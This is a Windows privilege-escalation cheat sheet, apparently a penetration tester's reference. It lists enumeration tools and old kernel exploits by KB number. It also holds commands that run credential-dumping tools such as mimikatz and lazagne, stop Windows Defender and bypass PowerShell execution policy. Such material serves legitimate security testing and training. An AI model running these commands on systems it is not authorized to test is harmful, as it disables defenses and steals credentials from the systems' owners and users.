# Windows Privilege Escalation
# Enumeration
# General scanning tools
winPEAS.exe
winPEAS.bat
windows-privesc-check2.exe
Seatbelt.exe -group=all
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
Powerless.bat
# Search for CVEs
systeminfo > sysinfo.txt
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx -i sysinfo.txt
sudo docker run --rm -it -v `pwd`:/data wes
systeminfo > systeminfo.txt
wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt
powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"
# Look for:
cheat autorun
cheat name_pipe
cheat AlwaysInstallElevated
cheat executable_files
cheat startup_app
cheat weak_service_permission
cheat unquoted_service_paths
cheat hot_potato
cheat CVE
# Common exploits
KiTrap0D (KB979682)
MS11-011 (KB2393802)
MS10-059 (KB982799)
MS10-021 (KB979683)
MS11-080 (KB2592799)
# Post exploitation
lazagne.exe all
SharpWeb.exe
mimikatz.exe
# Useful commands
# Disable Windows Defender
sc stop WinDefend
# Bypass PowerShell execution policy restriction
powershell -nop -ep bypass
# List hidden files
dir /a
# Find a file
dir /b/s "<FILE>"
# Methodology references
https://guif.re/windowseop
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md